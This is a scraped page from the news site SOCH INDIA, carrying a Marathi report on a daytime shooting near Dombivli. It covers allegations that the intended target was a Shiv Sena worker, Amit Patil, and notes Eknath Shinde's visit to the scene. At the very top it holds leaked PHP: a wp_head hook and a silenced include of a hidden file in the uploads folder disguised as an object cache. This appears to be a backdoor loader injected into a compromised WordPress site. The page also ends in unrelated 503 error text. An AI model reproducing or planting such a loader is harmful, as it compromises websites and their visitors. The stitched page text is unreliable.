add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); डोंबिवली भरदिवसा गोळीबार… – SOCH INDIA
Menu

अपराध समाचार
डोंबिवली भरदिवसा गोळीबार…

nobanner

डोंबिवली जवळील काटई नाका येथे भर दुपारी झालेल्या गोळीबाराच्या घटनेने खळबळ माजली आहे..विकी शर्मा या 30 वर्षीय तरुणावर बाईक वरून आलेल्या दोन जणांनी  गोळीबार केला आणि ते पळून गेले..

या गोळीबारात विकी शर्मा याच्या डोक्याला गंभीर दुखापत झाली असून त्याच्यावर डोंबिवली इथल्या खाजगी रुग्णालयात उपचार सुरु आहेत..मात्र हा हल्ला चुकून विकी शर्मा याच्यावर झाला असून हल्लेखोरांच टार्गेट हे स्थानिक शिवसेनेचा कार्यकर्ता अमित पाटील होता आणि विकी शर्मा त्याचा बॉडीगार्ड असून अमितवरच हल्ला करण्याचा उद्देश असल्याचा आरोप अमित पाटील च्या वडिलांनी केला आहे..

राजकीय वैमनस्यांतून आपल्या मुलावर हा हल्ला होत असून वारंवार आपणास विनोद रतन पाटील यांच्याकडून त्रास होत असल्याचा आरोप त्यांनी केला आहे, असे अमित पाटीलचे वडील नामदेव पाटील यांनी केला आहे.

तर पोलिसांनी सुद्धा त्या दृष्टीने तपास  सुरु केला असून हा हल्ला अमित पाटील वरच असल्याचा संशय व्यक्त केला आहे…या प्रकरणी मानपाडा पोलिस ठाण्यात गुन्हा दाखल करण्यात आला असून पोलिस आता पळून गेलेल्या हल्लेखोरांच्या मागावर आहेत..

दुसरीकडे या गोळीबाराला आता राजकीय वळण प्राप्त झालं असून ठाण्याचे पालकमंत्री एकनाथ शिंदे यांनी तात्काळ घटनास्थळी धाव घेत परिस्थिती चा आढावा घेतला..एकनाथ शिंदे यांनी सुद्धा हा हल्ला राजकीय वैमनस्यांतून झाला असून या मागे जे कोणी आहेत त्यांना लवकरात लवकर अटक करण्यात यावी अशी मागणी एकनाथ शिंदे यांनी केली आहे..

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.